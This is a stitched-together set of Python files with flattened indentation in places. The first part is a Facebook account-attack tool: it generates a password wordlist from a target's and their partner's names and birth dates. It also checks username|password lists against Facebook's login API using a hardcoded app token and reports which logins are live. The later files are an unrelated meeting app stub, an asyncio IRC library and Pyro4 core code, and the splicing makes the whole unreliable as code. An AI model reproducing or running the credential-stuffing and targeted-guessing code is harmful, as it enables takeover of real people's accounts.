other = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if other == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih_lain()
else:
if other == '1':
status()
else:
if other == '2':
wordlist()
else:
if other == '3':
check_akun()
else:
if other == '4':
grupsaya()
else:
if other == '5':
guard()
else:
if other == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + other + ' \x1b[1;91mnot found'
pilih_lain()
def status():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
msg = raw_input('\x1b[1;91m[+] \x1b[1;92mWrite status \x1b[1;91m:\x1b[1;97m ')
if msg == '':
print '\x1b[1;91m[!] Can\'t empty'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
res = requests.get('https://graph.facebook.com/me/feed?method=POST&message=' + msg + '&access_token=' + toket)
op = json.loads(res.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[+] \x1b[1;92mStatus ID\x1b[1;91m : \x1b[1;97m' + op['id']
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def wordlist():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;92mIsi data lengkap target dibawah'
print 52 * '\x1b[1;97m\xe2\x95\x90'
a = raw_input('\x1b[1;91m[+] \x1b[1;92mName Depan \x1b[1;97m: ')
file = open(a + '.txt', 'w')
b = raw_input('\x1b[1;91m[+] \x1b[1;92mName Tengah \x1b[1;97m: ')
c = raw_input('\x1b[1;91m[+] \x1b[1;92mName Belakang \x1b[1;97m: ')
d = raw_input('\x1b[1;91m[+] \x1b[1;92mName Panggilan \x1b[1;97m: ')
e = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ')
f = e[0:2]
g = e[2:4]
h = e[4:]
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;93mKalo Jomblo SKIP aja :v'
i = raw_input('\x1b[1;91m[+] \x1b[1;92mName Pacar \x1b[1;97m: ')
j = raw_input('\x1b[1;91m[+] \x1b[1;92mName Panggilan Pacar \x1b[1;97m: ')
k = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir Pacar >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
l = k[0:2]
m = k[2:4]
n = k[4:]
file.write('%s%s\n%s%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s' % (a, c, a, b, b, a, b, c, c, a, c, b, a, a, b, b, c, c, a, d, b, d, c, d, d, d, d, a, d, b, d, c, a, e, a, f, a, g, a, h, b, e, b, f, b, g, b, h, c, e, c, f, c, g, c, h, d, e, d, f, d, g, d, h, e, a, f, a, g, a, h, a, e, b, f, b, g, b, h, b, e, c, f, c, g, c, h, c, e, d, f, d, g, d, h, d, d, d, a, f, g, a, g, h, f, g, f, h, f, f, g, f, g, h, g, g, h, f, h, g, h, h, h, g, f, a, g, h, b, f, g, b, g, h, c, f, g, c, g, h, d, f, g, d, g, h, a, i, a, j, a, k, i, e, i, j, i, k, b, i, b, j, b, k, c, i, c, j, c, k, e, k, j, a, j, b, j, c, j, d, j, j, k, a, k, b, k, c, k, d, k, k, i, l, i, m, i, n, j, l, j, m, j, n, j, k))
wg = 0
while wg < 100:
wg = wg + 1
file.write(a + str(wg) + '\n')
en = 0
while en < 100:
en = en + 1
file.write(i + str(en) + '\n')
word = 0
while word < 100:
word = word + 1
file.write(d + str(word) + '\n')
gen = 0
while gen < 100:
gen = gen + 1
file.write(j + str(gen) + '\n')
file.close()
time.sleep(1.5)
print '\n\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m: \x1b[1;97m %s.txt' % a
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except IOError as e:
print '\x1b[1;91m[!] Make file failed'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def check_akun():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;92mIsi File\x1b[1;91m : \x1b[1;97musername|password'
print 52 * '\x1b[1;97m\xe2\x95\x90'
live = []
cek = []
die = []
try:
file = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m:\x1b[1;97m ')
list = open(file, 'r').readlines()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
pemisah = raw_input('\x1b[1;91m[+] \x1b[1;92mSeparator \x1b[1;91m:\x1b[1;97m ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for meki in list:
username, password = meki.strip().split(str(pemisah))
url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + password + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'
data = requests.get(url)
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
live.append(password)
print '\x1b[1;97m[\x1b[1;92mLive\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
elif 'www.facebook.com' in mpsh['error_msg']:
cek.append(password)
print '\x1b[1;97m[\x1b[1;93mCheck\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
else:
die.append(password)
print '\x1b[1;97m[\x1b[1;91mDie\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
print '\n\x1b[1;91m[+] \x1b[1;97mTotal\x1b[1;91m : \x1b[1;97mLive=\x1b[1;92m' + str(len(live)) + ' \x1b[1;97mCheck=\x1b[1;93m' + str(len(cek)) + ' \x1b[1;97mDie=\x1b[1;91m' + str(len(die))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def grupsaya():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
uh = requests.get('https://graph.facebook.com/me/groups?access_token=' + toket)
gud = json.loads(uh.text)
for p in gud['data']:
nama = p['name']
id = p['id']
f = open('grupid.txt', 'w')
listgrup.append(id)
f.write(id + '\n')
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + str(nama)
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + str(id)
print 52 * '\x1b[1;97m='
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Group \x1b[1;96m%s' % len(listgrup)
print '\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m: \x1b[1;97mgrupid.txt'
f.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except KeyError:
os.remove('grupid.txt')
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def guard():
global toket
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Enable'
print '║-> \x1b[1;37;40m2. Disable'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
g = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if g == '1':
aktif = 'true'
gaz(toket, aktif)
else:
if g == '2':
non = 'false'
gaz(toket, non)
else:
if g == '0':
lain()
else:
if g == '':
keluar()
else:
keluar()
def get_userid(toket):
url = 'https://graph.facebook.com/me?access_token=%s' % toket
res = requests.get(url)
uid = json.loads(res.text)
return uid['id']
def gaz(toket, enable=True):
id = get_userid(toket)
data = 'variables={"0":{"is_shielded": %s,"session_id":"9b78191c-84fd-4ab6-b0aa-19b39f04a6bc","actor_id":"%s","client_mutation_id":"b0316dd6-3fd6-4beb-aed4-bb29c5dc64b0"}}&method=post&doc_id=1477043292367183&query_name=IsShieldedSetMutation&strip_defaults=true&strip_nulls=true&locale=en_US&client_country_code=US&fb_api_req_friendly_name=IsShieldedSetMutation&fb_api_caller_class=IsShieldedSetMutation' % (enable, str(id))
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Authorization': 'OAuth %s' % toket}
url = 'https://graph.facebook.com/graphql'
res = requests.post(url, data=data, headers=headers)
print res.text
if '"is_shielded":true' in res.text:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mActivated'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
if '"is_shielded":false' in res.text:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;91mDeactivated'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
print '\x1b[1;91m[!] Error'
keluar()
if __name__ == '__main__':
login()
|
pymeet.py
|
from threading import Thread
import win
from net import connection
import receiver
import sender
import stream_server
def init():
    # Hook the receiver and sender up to the shared connection.
    receiver.init(con)
    sender.init(con)
if __name__ == "__main__":
    con = connection()
    # Run network I/O on a background thread while the camera stream server
    # runs in the main thread.
    Thread(target=init, daemon=False).start()
    stream_server.run_cam_server()
    # win.init_window()
|
aioirc.py
|
#!/usr/bin/env python3
#
# miniirc_extras.aioirc: asyncio-oriented IRC objects that are mostly
# compatible with existing IRC objects.
#
# Copyright © 2019 by luk3yx.
#
from __future__ import annotations
import atexit, asyncio, functools, miniirc, ssl, threading
from typing import Optional, Union
from . import AbstractIRC as _AbstractIRC
from .utils import dict_to_tags as _dict_to_tags
class _Awaitable:
__slots__ = ('_irc', '_writer')
async def _real_await(self):
await self._writer.drain()
    def __await__(self):
        # Only drain the writer when a live connection exists; otherwise
        # awaiting this object is a harmless no-op instead of a TypeError.
        if self._irc and self._irc.connected is not None and self._writer:
            return self._real_await().__await__()
        return iter(())
def __init__(self, irc=None, writer=None):
self._irc = irc
self._writer = writer
class _FakeSocket:
__slots__ = ('_irc',)
def settimeout(self, timeout: int) -> None:
self._irc.timeout = int(timeout)
def __init__(self, irc) -> None:
self._irc = irc
class AsyncIRC(miniirc.IRC):
"""
An asyncio-based miniirc-compatible IRC class.
"""
_pinged: bool = False
_event_loop = None
__awaitable = _Awaitable()
def main(self):
raise NotImplementedError
def _main(self):
raise NotImplementedError
# Run a coroutine and disregard its return value.
def _run(self, coro):
loop = self._event_loop
loop.call_soon_threadsafe(functools.partial(asyncio.ensure_future,
coro, loop=loop))
    # A replacement for irc.quote().
def quote(self, *msg: str, force: Optional[bool] = None, # type: ignore
tags: Optional[dict[str, Union[str, bool]]] = None) -> _Awaitable:
"""
Sends a raw message to IRC, use force=True to send while disconnected.
Do not send multiple commands in one irc.quote(), as the newlines will
be stripped and it will be sent as one command. The `tags` parameter
optionally allows you to add a dict with IRCv3 message tags, and will
not be sent to IRC servers that do not support message tags.
"""
if not tags and msg and isinstance(msg[0], dict):
tags = msg[0]
msg = msg[1:]
if self.connected or force:
self.debug('>3> ' + str(tags) if tags else '>>>', *msg)
self._run(self._raw_quote(tags, ' '.join(msg), force))
else:
self.debug('>Q>', *msg)
# TODO: Fix this
if hasattr(self, 'sendq'):
if self.sendq: # type: ignore
sendq = self.sendq # type: ignore
else:
sendq = []
self.sendq = sendq # type: ignore
elif self._sendq: # type: ignore
sendq = self._sendq = [] # type: ignore
else:
sendq = []
self._sendq = sendq = [] # type: ignore
if isinstance(tags, dict):
msg = (tags,) + msg # type: ignore
sendq.append(msg)
return self.__awaitable
def msg(self, target: str, *msg: str, # type: ignore
tags: Optional[dict[str, Union[str, bool]]] = None) -> _Awaitable:
return self.quote('PRIVMSG', str(target), ':' + ' '.join(msg),
tags=tags)
def notice(self, target: str, *msg: str, # type: ignore
tags: Optional[dict[str, Union[str, bool]]] = None) -> _Awaitable:
return self.quote('NOTICE', str(target), ':' + ' '.join(msg),
tags=tags)
def ctcp(self, target: str, *msg: str, reply: bool = False, # type: ignore
tags: Optional[dict[str, Union[str, bool]]] = None) -> _Awaitable:
m = (self.notice if reply else self.msg)
return m(target, '\x01{}\x01'.format(' '.join(msg)), tags=tags)
def me(self, target: str, *msg: str, # type: ignore
tags: Optional[dict[str, Union[str, bool]]] = None) -> _Awaitable:
return self.ctcp(target, 'ACTION', *msg, tags=tags)
# Actually send messages
async def _raw_quote(self, tags: Optional[dict[str, Union[str, bool]]],
msg: str, force: Optional[bool]) -> None:
# Oops, the connection was lost before this function got called.
if self.connected is None:
if not force:
self.quote(msg, tags=tags)
return
# Encode the message
msg = msg.replace('\r', ' ').replace('\n', ' ')
rawmsg = msg.encode('utf-8')[:self.msglen - 2] + b'\r\n'
if isinstance(tags, dict) \
and ('message-tags' in self.active_caps
or 'draft/message-tags-0.2' in self.active_caps):
rawmsg = _dict_to_tags(tags) + rawmsg
# Send the message
self.__writer.write(rawmsg)
def _start_handler(self, handlers, command, hostmask, tags, args):
r = False
for handler in handlers:
r = True
params = [self, hostmask, list(args)]
if not hasattr(handler, 'miniirc_colon') and args and \
args[-1].startswith(':'):
params[2][-1] = args[-1][1:]
if hasattr(handler, 'miniirc_ircv3'):
params.insert(2, dict(tags))
if hasattr(handler, 'miniirc_cmd_arg'):
params.insert(1, command)
if hasattr(handler, 'miniirc_coroutinefunc'):
self._run(handler(*params))
else:
threading.Thread(target=handler, args=params).start()
return r
def Handler(self, *args, **kwargs):
real_add_handler = super().Handler(*args, **kwargs)
def add_handler(func):
if asyncio.iscoroutinefunction(func):
getattr(func, '__func__', func).miniirc_coroutinefunc = True
return real_add_handler(func)
return add_handler
def CmdHandler(self, *args, **kwargs):
real_add_handler = super().CmdHandler(*args, **kwargs)
def add_handler(func):
if asyncio.iscoroutinefunction(func):
getattr(func, '__func__', func).miniirc_coroutinefunc = True
return real_add_handler(func)
return add_handler
# The same as miniirc's _main() but async.
    # This could use readuntil() or readline(); however, reading lines
    # "manually" keeps compatibility with unusual \r-only IRC servers.
async def __main(self) -> None:
reader = self.__reader
self.debug('Main loop running!')
buffer: bytes = b''
while True:
try:
assert len(buffer) < 65535, 'Very long line detected!'
try:
raw = await asyncio.wait_for(reader.read(8192),
self.ping_interval)
assert raw
buffer += raw.replace(b'\r', b'\n')
except asyncio.TimeoutError:
if self._pinged:
raise
else:
self._pinged = True
self.quote('PING', ':miniirc-ping', force=True)
except Exception as e:
self.debug('Lost connection!', repr(e))
self.disconnect(auto_reconnect=True)
while self.persist:
await asyncio.sleep(5)
self.debug('Reconnecting...')
try:
await self.async_connect()
except:
self.debug('Failed to reconnect!')
self.connected = None
else:
return
return
raw = buffer.split(b'\n') # type: ignore
buffer = raw.pop() # type: ignore
for line in raw:
line = line.decode('utf-8', 'replace') # type: ignore
if line:
self.debug('<<<', line)
try:
result = self._parse(line) # type: ignore
except:
result = None
if isinstance(result, tuple) and len(result) == 4:
self._handle(*result)
else:
self.debug('Ignored message:', line)
del raw
async def async_connect(self) -> None:
""" Connects to the IRC server if not already connected. """
if self.connected is not None:
self.debug('Already connected!')
return
if self._event_loop is None:
self._event_loop = asyncio.get_event_loop()
self.connected = False
self.debug('Connecting to', self.ip, 'port', self.port)
self.sock = _FakeSocket(self)
# Create an SSL context
ctx: Optional[ssl.SSLContext] = None
if self.ssl:
if self.verify_ssl:
ctx = ssl.create_default_context(cafile=miniirc.get_ca_certs())
ctx.verify_mode = ssl.CERT_REQUIRED
else:
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
# Get the stream reader and writer.
self.__reader, self.__writer = \
await asyncio.open_connection(self.ip, self.port, ssl=ctx)
self.__awaitable = _Awaitable(self, self.__writer)
# TODO: Something other than this.
self._unhandled_caps = None
self.quote('CAP LS 302', force=True)
self.quote('USER', self.ident, '0', '*', ':' + self.realname,
force=True)
self.quote('NICK', self.nick, force=True)
atexit.register(self.disconnect)
self.debug('Starting main loop...')
self._sasl = self._pinged = False
# Call main()
asyncio.ensure_future(self.__main())
def connect(self) -> None:
"""
Connects to the IRC server if not already connected.
If you are calling this from a coroutine you should use `async_connect`
instead.
"""
if self._event_loop is None:
self._event_loop = asyncio.get_event_loop()
self._run(self.async_connect())
def _update_docstrings():
for k in dir(AsyncIRC):
f, f2 = getattr(AsyncIRC, k), getattr(_AbstractIRC, k, None)
if f is not f2 and callable(f) and f.__doc__ is None and \
f2.__doc__ is not None:
f.__doc__ = f2.__doc__
_update_docstrings()
del _update_docstrings
|
core.py
|
"""
Core logic (uri, daemon, proxy stuff).
Pyro - Python Remote Objects. Copyright by Irmen de Jong (irmen@razorvine.net).
"""
from __future__ import print_function, division
import inspect
import re
import logging
import sys
import ssl
import os
import time
import threading
import uuid
import base64
import warnings
import socket
import random
from Pyro4 import errors, socketutil, util, constants, message, futures
from Pyro4.configuration import config
__all__ = ["URI", "Proxy", "Daemon", "current_context", "callback", "batch", "asyncproxy", "expose", "behavior",
"oneway", "SerializedBlob", "_resolve", "_locateNS"]
if sys.version_info >= (3, 0):
basestring = str
log = logging.getLogger("Pyro4.core")
class URI(object):
"""
Pyro object URI (universal resource identifier).
The uri format is like this: ``PYRO:objectid@location`` where location is one of:
- ``hostname:port`` (tcp/ip socket on given port)
- ``./u:sockname`` (Unix domain socket on localhost)
There is also a 'Magic format' for simple name resolution using Name server:
``PYRONAME:objectname[@location]`` (optional name server location, can also omit location port)
And one that looks up things in the name server by metadata:
``PYROMETA:meta1,meta2,...[@location]`` (optional name server location, can also omit location port)
You can write the protocol in lowercase if you like (``pyro:...``) but it will
automatically be converted to uppercase internally.
"""
uriRegEx = re.compile(r"(?P<protocol>[Pp][Yy][Rr][Oo][a-zA-Z]*):(?P<object>\S+?)(@(?P<location>.+))?$")
def __init__(self, uri):
if isinstance(uri, URI):
state = uri.__getstate__()
self.__setstate__(state)
return
if not isinstance(uri, basestring):
raise TypeError("uri parameter object is of wrong type")
self.sockname = self.host = self.port = None
match = self.uriRegEx.match(uri)
if not match:
raise errors.PyroError("invalid uri")
self.protocol = match.group("protocol").upper()
self.object = match.group("object")
location = match.group("location")
if self.protocol == "PYRONAME":
self._parseLocation(location, config.NS_PORT)
elif self.protocol == "PYRO":
if not location:
raise errors.PyroError("invalid uri")
self._parseLocation(location, None)
elif self.protocol == "PYROMETA":
self.object = set(m.strip() for m in self.object.split(","))
self._parseLocation(location, config.NS_PORT)
else:
raise errors.PyroError("invalid uri (protocol)")
def _parseLocation(self, location, defaultPort):
if not location:
return
if location.startswith("./u:"):
self.sockname = location[4:]
if (not self.sockname) or ':' in self.sockname:
raise errors.PyroError("invalid uri (location)")
else:
if location.startswith("["): # ipv6
if location.startswith("[["): # possible mistake: double-bracketing
raise errors.PyroError("invalid ipv6 address: enclosed in too many brackets")
ipv6locationmatch = re.match(r"\[([0-9a-fA-F:%]+)](:(\d+))?", location)
if not ipv6locationmatch:
raise errors.PyroError("invalid ipv6 address: the part between brackets must be a numeric ipv6 address")
self.host, _, self.port = ipv6locationmatch.groups()
else:
self.host, _, self.port = location.partition(":")
if not self.port:
self.port = defaultPort
try:
self.port = int(self.port)
except (ValueError, TypeError):
raise errors.PyroError("invalid port in uri, port=" + str(self.port))
@staticmethod
def isUnixsockLocation(location):
"""determine if a location string is for a Unix domain socket"""
return location.startswith("./u:")
@property
def location(self):
"""property containing the location string, for instance ``"servername.you.com:5555"``"""
if self.host:
if ":" in self.host: # ipv6
return "[%s]:%d" % (self.host, self.port)
else:
return "%s:%d" % (self.host, self.port)
elif self.sockname:
return "./u:" + self.sockname
else:
return None
def asString(self):
"""the string representation of this object"""
if self.protocol == "PYROMETA":
result = "PYROMETA:" + ",".join(self.object)
else:
result = self.protocol + ":" + self.object
location = self.location
if location:
result += "@" + location
return result
def __str__(self):
string = self.asString()
if sys.version_info < (3, 0) and type(string) is unicode:
return string.encode("ascii", "replace")
return string
def __unicode__(self):
return self.asString()
def __repr__(self):
return "<%s.%s at 0x%x; %s>" % (self.__class__.__module__, self.__class__.__name__, id(self), str(self))
def __eq__(self, other):
if not isinstance(other, URI):
return False
return (self.protocol, self.object, self.sockname, self.host, self.port) ==\
(other.protocol, other.object, other.sockname, other.host, other.port)
def __ne__(self, other):
return not self.__eq__(other)
def __hash__(self):
return hash((self.protocol, str(self.object), self.sockname, self.host, self.port))
# note: getstate/setstate are not needed if we use pickle protocol 2,
# but this way it helps pickle to make the representation smaller by omitting all attribute names.
def __getstate__(self):
return self.protocol, self.object, self.sockname, self.host, self.port
def __setstate__(self, state):
self.protocol, self.object, self.sockname, self.host, self.port = state
def __getstate_for_dict__(self):
return self.__getstate__()
def __setstate_from_dict__(self, state):
self.__setstate__(state)
class _RemoteMethod(object):
"""method call abstraction"""
def __init__(self, send, name, max_retries):
self.__send = send
self.__name = name
self.__max_retries = max_retries
def __getattr__(self, name):
return _RemoteMethod(self.__send, "%s.%s" % (self.__name, name), self.__max_retries)
def __call__(self, *args, **kwargs):
for attempt in range(self.__max_retries + 1):
try:
return self.__send(self.__name, args, kwargs)
except (errors.ConnectionClosedError, errors.TimeoutError):
# only retry for recoverable network errors
if attempt >= self.__max_retries:
# last attempt, raise the exception
raise
class Proxy(object):
"""
Pyro proxy for a remote object. Intercepts method calls and dispatches them to the remote object.
.. automethod:: _pyroBind
.. automethod:: _pyroRelease
.. automethod:: _pyroReconnect
.. automethod:: _pyroBatch
.. automethod:: _pyroAsync
.. automethod:: _pyroAnnotations
.. automethod:: _pyroResponseAnnotations
.. automethod:: _pyroValidateHandshake
.. autoattribute:: _pyroTimeout
.. autoattribute:: _pyroHmacKey
.. attribute:: _pyroMaxRetries
Number of retries to perform on communication calls by this proxy, allows you to override the default setting.
.. attribute:: _pyroSerializer
Name of the serializer to use by this proxy, allows you to override the default setting.
.. attribute:: _pyroHandshake
The data object that should be sent in the initial connection handshake message. Can be any serializable object.
"""
__pyroAttributes = frozenset(
["__getnewargs__", "__getnewargs_ex__", "__getinitargs__", "_pyroConnection", "_pyroUri",
"_pyroOneway", "_pyroMethods", "_pyroAttrs", "_pyroTimeout", "_pyroSeq", "_pyroHmacKey",
"_pyroRawWireResponse", "_pyroHandshake", "_pyroMaxRetries", "_pyroSerializer", "_Proxy__async",
"_Proxy__pyroHmacKey", "_Proxy__pyroTimeout", "_Proxy__pyroConnLock"])
def __init__(self, uri, connected_socket=None):
if connected_socket:
uri = URI("PYRO:" + uri + "@<<connected-socket>>:0")
if isinstance(uri, basestring):
uri = URI(uri)
elif not isinstance(uri, URI):
raise TypeError("expected Pyro URI")
self._pyroUri = uri
self._pyroConnection = None
self._pyroSerializer = None # can be set to the name of a serializer to override the global one per-proxy
self._pyroMethods = set() # all methods of the remote object, gotten from meta-data
self._pyroAttrs = set() # attributes of the remote object, gotten from meta-data
self._pyroOneway = set() # oneway-methods of the remote object, gotten from meta-data
self._pyroSeq = 0 # message sequence number
self._pyroRawWireResponse = False # internal switch to enable wire level responses
self._pyroHandshake = "hello" # the data object that should be sent in the initial connection handshake message
self._pyroMaxRetries = config.MAX_RETRIES
self.__pyroHmacKey = None
self.__pyroTimeout = config.COMMTIMEOUT
self.__pyroConnLock = threading.RLock()
util.get_serializer(config.SERIALIZER) # assert that the configured serializer is available
self.__async = False
current_context.annotations = {}
current_context.response_annotations = {}
if connected_socket:
self.__pyroCreateConnection(False, connected_socket)
@property
def _pyroHmacKey(self):
"""the HMAC key (bytes) that this proxy uses"""
return self.__pyroHmacKey
@_pyroHmacKey.setter
def _pyroHmacKey(self, value):
# if needed, convert the hmac value to bytes first
if value and sys.version_info >= (3, 0) and type(value) is not bytes:
value = value.encode("utf-8") # convert to bytes
self.__pyroHmacKey = value
def __del__(self):
if hasattr(self, "_pyroConnection"):
self._pyroRelease()
def __getattr__(self, name):
if name in Proxy.__pyroAttributes:
# allows it to be safely pickled
raise AttributeError(name)
if config.METADATA:
# get metadata if it's not there yet
if not self._pyroMethods and not self._pyroAttrs:
self._pyroGetMetadata()
if name in self._pyroAttrs:
return self._pyroInvoke("__getattr__", (name,), None)
if config.METADATA and name not in self._pyroMethods:
# client side check if the requested attr actually exists
raise AttributeError("remote object '%s' has no exposed attribute or method '%s'" % (self._pyroUri, name))
if self.__async:
return _AsyncRemoteMethod(self, name, self._pyroMaxRetries)
return _RemoteMethod(self._pyroInvoke, name, self._pyroMaxRetries)
def __setattr__(self, name, value):
if name in Proxy.__pyroAttributes:
return super(Proxy, self).__setattr__(name, value) # one of the special pyro attributes
if config.METADATA:
# get metadata if it's not there yet
if not self._pyroMethods and not self._pyroAttrs:
self._pyroGetMetadata()
if name in self._pyroAttrs:
return self._pyroInvoke("__setattr__", (name, value), None) # remote attribute
if config.METADATA:
# client side validation if the requested attr actually exists
raise AttributeError("remote object '%s' has no exposed attribute '%s'" % (self._pyroUri, name))
# metadata disabled, just treat it as a local attribute on the proxy:
return super(Proxy, self).__setattr__(name, value)
def __repr__(self):
if self._pyroConnection:
connected = "connected " + self._pyroConnection.family()
else:
connected = "not connected"
return "<%s.%s at 0x%x; %s; for %s>" % (self.__class__.__module__, self.__class__.__name__,
id(self), connected, self._pyroUri)
def __unicode__(self):
return str(self)
def __getstate_for_dict__(self):
encodedHmac = None
if self._pyroHmacKey is not None:
encodedHmac = "b64:" + (base64.b64encode(self._pyroHmacKey).decode("ascii"))
# for backwards compatibility reasons we also put the timeout and maxretries into the state
return self._pyroUri.asString(), tuple(self._pyroOneway), tuple(self._pyroMethods), tuple(self._pyroAttrs),\
self.__pyroTimeout, encodedHmac, self._pyroHandshake, self._pyroMaxRetries, self._pyroSerializer
def __setstate_from_dict__(self, state):
uri = URI(state[0])
oneway = set(state[1])
methods = set(state[2])
attrs = set(state[3])
timeout = state[4]
hmac_key = state[5]
handshake = state[6]
max_retries = state[7]
serializer = None if len(state) < 9 else state[8]
if hmac_key:
if hmac_key.startswith("b64:"):
hmac_key = base64.b64decode(hmac_key[4:].encode("ascii"))
else:
raise errors.ProtocolError("hmac encoding error")
self.__setstate__((uri, oneway, methods, attrs, timeout, hmac_key, handshake, max_retries, serializer))
def __getstate__(self):
# for backwards compatibility reasons we also put the timeout and maxretries into the state
return self._pyroUri, self._pyroOneway, self._pyroMethods, self._pyroAttrs, self.__pyroTimeout, \
self._pyroHmacKey, self._pyroHandshake, self._pyroMaxRetries, self._pyroSerializer
def __setstate__(self, state):
# Note that the timeout and maxretries are also part of the state (for backwards compatibility reasons),
# but we're not using them here. Instead we get the configured values from the 'local' config.
self._pyroUri, self._pyroOneway, self._pyroMethods, self._pyroAttrs, _, self._pyroHmacKey, self._pyroHandshake = state[:7]
self._pyroSerializer = None if len(state) < 9 else state[8]
self.__pyroTimeout = config.COMMTIMEOUT
